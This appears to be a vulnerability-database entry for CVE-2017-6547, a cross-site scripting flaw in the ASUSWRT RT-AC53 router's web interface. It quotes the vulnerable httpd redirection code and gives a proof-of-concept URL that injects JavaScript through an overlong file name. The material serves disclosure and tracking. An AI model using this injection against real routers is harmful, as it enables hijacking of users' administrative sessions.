ID

VAR-E-201703-0071


CVE

cve_id:CVE-2017-6547

Trust: 1.8

cve_id:CVE-2017-6549

Trust: 0.8

cve_id:CVE-2017-6548

Trust: 0.3

sources: BID: 96938 // PACKETSTORM: 142066 // PACKETSTORM: 142065 // EXPLOIT-DB: 41571

EDB ID

41571


TITLE

ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 41571

DESCRIPTION

ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting. CVE-2017-6547 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 41571

AFFECTED PRODUCTS

vendor:asuswrtmodel:rt-ac53scope:eqversion:(3.0.0.4.380.6038)

Trust: 1.6

vendor:asusmodel:wrt cross site scripting nmap nse scriptscope: - version: -

Trust: 0.5

vendor:asusmodel:wrt session hijacking nmap nse scriptscope: - version: -

Trust: 0.5

vendor:asusmodel:asuswrt rt-ac53scope:eqversion:3.0.0.4.380.6038

Trust: 0.3

vendor:asusmodel:asuswrt rt-ac53scope:eqversion:0

Trust: 0.3

sources: BID: 96938 // PACKETSTORM: 142066 // PACKETSTORM: 142065 // EXPLOIT-DB: 41571 // EDBNET: 91798

EXPLOIT

Cross-Site Scripting (XSS)

Component: httpd

CVE: CVE-2017-6547

Vulnerability:

httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.

...

if(strlen(file) > 50 &&!(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
{
char inviteCode[256];
snprintf(inviteCode, sizeof(inviteCode), "<script>location.href='/cloud_sync.asp?flag=%s';</script>", file);
send_page( 200, "OK", (char*) 0, inviteCode, 0);

...
PoC:

http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'A

Trust: 1.0

sources: EXPLOIT-DB: 41571

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 41571

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 41571

TYPE

Cross-Site Scripting

Trust: 1.6

sources: EXPLOIT-DB: 41571 // EDBNET: 91798

TAGS

tag:exploit

Trust: 1.0

tag:xss

Trust: 0.5

sources: PACKETSTORM: 142066 // PACKETSTORM: 142065

CREDITS

Bruno Bierbaumer

Trust: 0.6

sources: EXPLOIT-DB: 41571

EXTERNAL IDS

db:NVDid:CVE-2017-6547

Trust: 1.8

db:EXPLOIT-DBid:41571

Trust: 1.6

db:NVDid:CVE-2017-6549

Trust: 0.8

db:EDBNETid:91798

Trust: 0.6

db:PACKETSTORMid:142066

Trust: 0.5

db:PACKETSTORMid:142065

Trust: 0.5

db:NVDid:CVE-2017-6548

Trust: 0.3

db:BIDid:96938

Trust: 0.3

sources: BID: 96938 // PACKETSTORM: 142066 // PACKETSTORM: 142065 // EXPLOIT-DB: 41571 // EDBNET: 91798

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-6547

Trust: 1.5

url:https://bierbaumer.net/security/asuswrt/

Trust: 1.3

url:https://www.exploit-db.com/exploits/41571/

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2017-6549

Trust: 0.5

url:https://www.asus.com/asuswrt/

Trust: 0.3

sources: BID: 96938 // PACKETSTORM: 142066 // PACKETSTORM: 142065 // EXPLOIT-DB: 41571 // EDBNET: 91798

SOURCES

db:BIDid:96938
db:PACKETSTORMid:142066
db:PACKETSTORMid:142065
db:EXPLOIT-DBid:41571
db:EDBNETid:91798

LAST UPDATE DATE

2022-07-27T09:11:32.526000+00:00


SOURCES UPDATE DATE

db:BIDid:96938date:2017-03-23T00:01:00

SOURCES RELEASE DATE

db:BIDid:96938date:2017-03-09T00:00:00
db:PACKETSTORMid:142066date:2017-04-07T17:32:22
db:PACKETSTORMid:142065date:2017-04-07T13:33:33
db:EXPLOIT-DBid:41571date:2017-03-08T00:00:00
db:EDBNETid:91798date:2017-03-10T00:00:00